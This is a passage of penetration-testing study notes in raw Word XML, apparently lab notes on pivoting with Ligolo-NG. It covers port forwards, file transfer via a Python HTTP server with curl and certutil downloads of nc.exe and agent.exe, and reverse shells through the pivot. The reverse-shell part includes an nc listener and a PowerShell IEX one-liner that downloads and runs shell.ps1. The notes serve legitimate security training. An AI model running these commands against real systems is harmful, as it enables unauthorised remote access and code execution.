      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener_add --addr 0.0.0.0:5555 --to 127.0.0.1:5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000765">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="284"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This forwards traffic from port 5555 of pivot to our Kali on port 5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000766">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000767">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we set up listener on port 5555 of Kali, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and we ran the reverse shell targeting the PIVOT on port 5555 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(and not our Kali), which was then forwarded to our Kali on port 5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000768">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000769">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And make sure to send the rev shell to the 10.10.xxx.0/24 IP of the target machine. Since the pivot has 2 IPs, you need to find the 10.10.xxx.0/24 IP, and not the 192 one. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rPr/>
      </w:pP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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000076E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000076F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uyjb9otocbog" w:id="64"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Transfer with Ligolo-NG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000770">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000771">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000772">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener_add --addr 0.0.0.0:&lt;PIVOT MACHINE PORT&gt; --to 127.0.0.1:&lt;ATTACKER PORT&gt; --tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000773">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener_add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → create a port forward inside Ligolo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000774">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--addr 0.0.0.0:&lt;PIVOT MACHINE PORT&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → listen on the pivot machine on this port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000775">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--to 127.0.0.1:&lt;KALI PORT&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ forward traffic to attacker’s localhost on Kali Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000776">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--tcp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ specifies protocol is TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000777">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000778">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This creates a port forward:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000779">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivot listens on &lt;PIVOT_MACHINE_PORT&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Any connection hitting that port gets forwarded over the tunnel to your Kali on &lt;ATTACKER_PORT&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example – transfer file using Python HTTP server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener_add --addr 0.0.0.0:&lt;PIVOT MACHINE PORT&gt; --to 127.0.0.1:8080 --tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000780">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you can curl from the victim machine, targeting 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000781">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://&lt;victim&gt;:8080/nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000782">
      <w:pPr>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t xml:space="preserve">Now:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000784">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1384"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim/pivot connects to http://127.0.0.1:8000 (on itself).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000785">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1384"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo forwards that traffic to your Kali’s port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000786">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1384"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim downloads your file like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000787">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1384"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">certutil -urlcache -split -f http://127.0.0.1:8000/agent.exe agent.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000788">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p2xjlabd7c8e" w:id="65"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell with Ligolo-NG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000789">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000078A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`listener_add --addr 0.0.0.0:&lt;PIVOT MACHINE PORT&gt; --to 127.0.0.1:&lt;ATTACKER PORT&gt; --tcp`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000078B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same format as file transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000078C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you set it up so when the victim runs a reverse shell to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;PIVOT MACHINE IP&gt;:&lt;PIVOT MACHINE PORT&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, Ligolo forwards it back to your attacker machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:&lt;ATTACKER PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000078D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000078E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set reverse shell to connect to pivot machine IP and port!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000078F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000790">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example – reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000791">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000792">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000793">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000794">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In Ligolo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener_add --addr 0.0.0.0:9001 --to 127.0.0.1:4444 --tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000796">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000797">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On victim:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000798">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="466"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://127.0.0.1:9001/shell.ps1')"</w:t>
      </w:r>
    </w:p>
